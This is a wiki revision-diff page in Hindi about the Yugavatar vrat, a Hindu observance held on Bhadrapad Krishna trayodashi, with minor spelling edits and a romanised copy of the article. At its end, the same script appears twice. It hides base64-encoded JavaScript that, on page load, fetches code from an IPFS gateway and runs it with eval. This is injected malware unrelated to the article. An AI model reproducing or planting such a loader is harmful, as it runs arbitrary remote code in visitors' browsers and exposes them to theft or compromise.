Difference between revisions of "युगावतार व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "उल्लखित" to "उल्लिखित")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*युगावतारव्रत [[भाद्रपद]] [[कृष्ण पक्ष]] की [[त्रियोदशी]] पर जब [[द्वापर युग]] का आरम्भ हुआ से किया जाता है।
+
*युगावतार व्रत [[भाद्रपद]] [[कृष्ण पक्ष]] की [[त्रयोदशी]] पर जब [[द्वापर युग]] का आरम्भ हुआ से किया जाता है।
*युगावतारव्रत में शरीर पर [[गौमूत्र]], [[गोबर]], [[दूर्वा]] एवं [[मिट्टी]] का प्रयोग और गहरे [[जल]] या [[तालाब]] में स्नान किया जाता है।
+
*युगावतारव्रत में शरीर पर गौमूत्र, गोबर, [[दूर्वा]] एवं [[मिट्टी]] का प्रयोग और गहरे [[जल]] या तालाब में स्नान किया जाता है।
*युगावतारव्रत करने से गया [[श्राद्ध]] का [[फल (परिणाम|फल]] मिलता है।
+
*युगावतारव्रत करने से गया [[श्राद्ध]] का [[फल]] मिलता है।
 
*ऐसी मान्यता है कि युगावतारव्रत में [[विष्णु]] प्रतिमा का [[घी]], [[दूध]] एवं [[जल]] से स्नान करना चाहिए।
 
*ऐसी मान्यता है कि युगावतारव्रत में [[विष्णु]] प्रतिमा का [[घी]], [[दूध]] एवं [[जल]] से स्नान करना चाहिए।
 
*ऐसी मान्यता है कि युगावतारव्रत करने से विष्णुलोक की प्राप्ति होती है।<ref>हेमाद्रि व्रत खण्ड 2, 518-519, [[भविष्यपुराण]] से उद्धरण</ref>
 
*ऐसी मान्यता है कि युगावतारव्रत करने से विष्णुलोक की प्राप्ति होती है।<ref>हेमाद्रि व्रत खण्ड 2, 518-519, [[भविष्यपुराण]] से उद्धरण</ref>
 
*कुछ लोगों का कथन है कि इस दिन [[त्रेतायुग]] का अभ्युदय हुआ था।
 
*कुछ लोगों का कथन है कि इस दिन [[त्रेतायुग]] का अभ्युदय हुआ था।
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:55, 14 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yugavatar vrat bhadrapad krishna paksh ki trayodashi par jab dvapar yug ka arambh hua se kiya jata hai.
  • yugavataravrat mean sharir par gaumootr, gobar, doorva evan mitti ka prayog aur gahare jal ya talab mean snan kiya jata hai.
  • yugavataravrat karane se gaya shraddh ka phal milata hai.
  • aisi manyata hai ki yugavataravrat mean vishnu pratima ka ghi, doodh evan jal se snan karana chahie.
  • aisi manyata hai ki yugavataravrat karane se vishnulok ki prapti hoti hai.[1]
  • kuchh logoan ka kathan hai ki is din tretayug ka abhyuday hua tha.

tika tippani aur sandarbh

  1. hemadri vrat khand 2, 518-519, bhavishyapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>